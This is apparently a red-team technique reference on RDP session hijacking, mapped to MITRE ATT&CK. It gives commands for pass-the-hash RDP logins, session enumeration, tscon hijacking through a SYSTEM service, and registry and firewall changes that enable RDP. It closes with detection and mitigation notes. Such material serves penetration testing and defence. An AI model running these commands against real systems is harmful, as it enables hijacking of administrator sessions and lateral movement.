RDP Hijacking

Overview

RDP hijacking takes over an existing disconnected (or active) RDP session without the user's password. When a user disconnects from RDP (instead of logging off), their session remains active on the server. A SYSTEM-level user can switch into that session using tscon, effectively impersonating the disconnected user. This is particularly powerful when a Domain Admin has a disconnected session.

ATT&CK Mapping

• Tactic: TA0008 - Lateral Movement
• Technique: T1021.001 - Remote Services: Remote Desktop Protocol
• Technique: T1563.002 - Remote Service Session Hijacking: RDP Hijacking

Prerequisites

• SYSTEM privileges on a Windows server with active/disconnected RDP sessions
• RDP service enabled on the target (TCP 3389)
• For standard RDP: valid credentials and network access to TCP 3389

Techniques

Standard RDP Access

# xfreerdp3
# https://github.com/FreeRDP/FreeRDP
xfreerdp3 /v:<target> /u:<user> /p:<password> /d:<domain>

# With pass-the-hash (restricted admin mode must be enabled on target)
xfreerdp3 /v:<target> /u:<user> /pth:<NThash> /d:<domain>

# Dynamic resolution (note: + prefix enables boolean toggles in xfreerdp3)
xfreerdp3 /v:<target> /u:<user> /p:<password> +dynamic-resolution

# Share a local directory
xfreerdp3 /v:<target> /u:<user> /p:<password> /drive:share,/local/path

# NetExec — check RDP access
# https://github.com/Pennyw0rth/NetExec
nxc rdp <target> -u <user> -p <password>

RDP Session Hijacking

Requires SYSTEM on the target server. No password needed for the hijacked session:

:: List active and disconnected sessions
query user
:: Or:
qwinsta

:: Output example:
:: USERNAME    SESSIONNAME   ID  STATE    TYPE
:: admin       rdp-tcp#0      1  Active
:: domainadmin                 2  Disc        ← Disconnected session, ripe for hijacking

:: Hijack session 2 (as SYSTEM)
:: If already SYSTEM:
tscon 2 /dest:console

:: If need SYSTEM first, create a service:
sc create hijack binpath= "cmd.exe /k tscon 2 /dest:console"
net start hijack

The tscon command switches the specified session to the current console. When run as SYSTEM, it does not require the target user's password.

Enabling RDP (Post-Exploitation)

If RDP is disabled and you have admin access:

:: Enable RDP via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

:: Allow through firewall
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

:: Add user to Remote Desktop Users
net localgroup "Remote Desktop Users" <user> /add

Restricted Admin Mode

Restricted Admin mode allows RDP with NTLM hash (pass-the-hash) but does not send credentials to the remote host:

:: Enable Restricted Admin on target (requires admin)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

# Connect with pass-the-hash
xfreerdp3 /v:<target> /u:<user> /pth:<NThash> /d:<domain>

Detection Methods

Network-Based Detection

• RDP connections (TCP 3389) from unexpected sources
• RDP connections during unusual hours or from non-admin workstations

Host-Based Detection

• Event ID 4778 — session reconnected (RDP hijacking indicator)
• Event ID 4779 — session disconnected
• Service creation with tscon in the binary path
• qwinsta or query user execution (session enumeration)

Mitigation Strategies

• Log off instead of disconnect — enforce logoff on disconnect via GPO
• Set session time limits — automatically log off disconnected sessions after a timeout
• Network Level Authentication (NLA) — requires authentication before session is established
• Restrict RDP access — limit RDP to specific admin networks via firewall rules
• Disable Restricted Admin — prevents pass-the-hash over RDP (unless specifically needed)

References

Official Documentation

• FreeRDP / xfreerdp3

MITRE ATT&CK

• T1021.001 - Remote Services: Remote Desktop Protocol
• T1563.002 - Remote Service Session Hijacking: RDP Hijacking